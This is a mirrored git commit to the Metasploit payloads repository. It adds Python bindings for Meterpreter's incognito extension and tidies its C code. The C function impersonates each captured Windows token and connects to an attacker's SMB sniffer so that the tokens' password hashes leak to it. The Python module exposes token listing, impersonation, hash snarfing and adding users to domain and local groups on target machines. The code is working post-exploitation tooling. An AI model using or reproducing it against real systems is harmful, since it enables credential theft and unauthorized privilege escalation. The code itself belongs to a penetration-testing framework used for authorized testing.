1
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-01-02 11:36:22 +01:00

Add incognito binding, code tidies

This commit is contained in:
OJ 2015-11-03 17:52:06 +10:00
parent cbb50227a5
commit e016e6d526
4 changed files with 113 additions and 20 deletions

View File

@ -48,26 +48,29 @@ DWORD request_incognito_snarf_hashes(Remote *remote, Packet *packet)
}
// Use every token and get hashes by connecting to SMB sniffer
for (i=0;i<num_tokens;i++)
if (token_list[i].token)
for (i = 0; i < num_tokens; i++)
{
get_domain_from_token(token_list[i].token, domain_name, BUF_SIZE);
// If token is not "useless" local account connect to sniffer
if (_stricmp(domain_name, "NT AUTHORITY"))
if (token_list[i].token)
{
// Impersonate token
ImpersonateLoggedOnUser(token_list[i].token);
// Cancel previous connection to ensure hashes are sent and existing connection isn't reused
WNetCancelConnection2A(nr.lpRemoteName, 0, TRUE);
// Connect to smb sniffer
if (!WNetAddConnection2A(&nr, NULL, NULL, 0))
get_domain_from_token(token_list[i].token, domain_name, BUF_SIZE);
// If token is not "useless" local account connect to sniffer
if (_stricmp(domain_name, "NT AUTHORITY"))
{
// Impersonate token
ImpersonateLoggedOnUser(token_list[i].token);
// Revert to primary token
RevertToSelf();
// Cancel previous connection to ensure hashes are sent and existing connection isn't reused
WNetCancelConnection2A(nr.lpRemoteName, 0, TRUE);
// Connect to smb sniffer
if (!WNetAddConnection2A(&nr, NULL, NULL, 0))
{
// Revert to primary token
RevertToSelf();
}
}
CloseHandle(token_list[i].token);
}
CloseHandle(token_list[i].token);
}
packet_transmit_response(ERROR_SUCCESS, remote, response);
@ -77,7 +80,9 @@ cleanup:
// Restore token impersonation
if (saved_token != INVALID_HANDLE_VALUE)
{
ImpersonateLoggedOnUser(saved_token);
}
return ERROR_SUCCESS;
}

View File

@ -1,2 +1,2 @@
__all__ = ['core', 'elevate', 'fs', 'tlv', 'kiwi', 'user', 'sys', 'extapi']
__all__ = ['core', 'elevate', 'fs', 'tlv', 'kiwi', 'user', 'sys', 'extapi', 'incognito']

View File

@ -0,0 +1,77 @@
import meterpreter_bindings
from meterpreter.core import *
from meterpreter.tlv import *
INCOGNITO_NO_TOKENS = 'No tokens available\n'
def list_user_tokens():
return __list_tokens_internal(0)
def list_group_tokens():
return __list_tokens_internal(1)
def __list_tokens_internal(order):
tlv = tlv_pack(TLV_TYPE_INCOGNITO_LIST_TOKENS_TOKEN_ORDER, order)
resp = invoke_meterpreter('incognito_list_tokens', True, tlv)
if resp == None:
return None
if packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] != 0:
return None
delegation = packet_get_tlv(resp, TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION)['value']
impersonation = packet_get_tlv(resp, TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION)['value']
return {
'Impersonation': impersonation.strip().split('\n') if impersonation != INCOGNITO_NO_TOKENS else [],
'Delegation': delegation.strip().split('\n') if delegation != INCOGNITO_NO_TOKENS else []
}
def impersonate(user):
tlv = tlv_pack(TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN, user)
resp = invoke_meterpreter('incognito_impersonate_token', True, tlv)
if resp == None:
return False
return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
def snarf_hashes(server):
tlv = tlv_pack(TLV_TYPE_INCOGNITO_SERVERNAME, server)
resp = invoke_meterpreter('incognito_snarf_hashes', True, tlv)
if resp == None:
return False
return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
def add_user(server, username, password):
tlv = tlv_pack(TLV_TYPE_INCOGNITO_SERVERNAME, server)
tlv += tlv_pack(TLV_TYPE_INCOGNITO_USERNAME, username)
tlv += tlv_pack(TLV_TYPE_INCOGNITO_PASSWORD, password)
resp = invoke_meterpreter('incognito_add_user', True, tlv)
if resp == None:
return False
return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
def add_group_user(server, group, username):
return __add_group_user_internal('incognito_add_group_user', server, group, username)
def add_localgroup_user(server, group, username):
return __add_group_user_internal('incognito_add_localgroup_user', server, group, username)
def __add_group_user_internal(msg, server, group, username):
tlv = tlv_pack(TLV_TYPE_INCOGNITO_SERVERNAME, server)
tlv += tlv_pack(TLV_TYPE_INCOGNITO_USERNAME, username)
tlv += tlv_pack(TLV_TYPE_INCOGNITO_GROUPNAME, group)
resp = invoke_meterpreter(msg, True, tlv)
if resp == None:
return False
return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0

View File

@ -1,8 +1,9 @@
from meterpreter.core import *
TLV_STDAPI_EXTENSION = 0
TLV_PRIV_EXTENSION = 20000
TLV_KIWI_EXTENSION = 20000
TLV_STDAPI_EXTENSION = 0
TLV_INCOGNITO_EXTENSION = 20000
TLV_PRIV_EXTENSION = 20000
TLV_KIWI_EXTENSION = 20000
# Stdapi constants
TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1040)
@ -45,4 +46,14 @@ TLV_TYPE_KIWI_PWD_AUTH_LO = TLV_META_TYPE_UINT | (TLV_KIWI_EXTENSION +
TLV_TYPE_KIWI_PWD_LMHASH = TLV_META_TYPE_STRING | (TLV_KIWI_EXTENSION + 8)
TLV_TYPE_KIWI_PWD_NTLMHASH = TLV_META_TYPE_STRING | (TLV_KIWI_EXTENSION + 9)
# Incognito constants
TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 2)
TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 3)
TLV_TYPE_INCOGNITO_LIST_TOKENS_TOKEN_ORDER = TLV_META_TYPE_UINT | (TLV_INCOGNITO_EXTENSION + 4)
TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 5)
TLV_TYPE_INCOGNITO_GENERIC_RESPONSE = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 6)
TLV_TYPE_INCOGNITO_USERNAME = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 7)
TLV_TYPE_INCOGNITO_PASSWORD = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 8)
TLV_TYPE_INCOGNITO_SERVERNAME = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 9)
TLV_TYPE_INCOGNITO_GROUPNAME = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 10)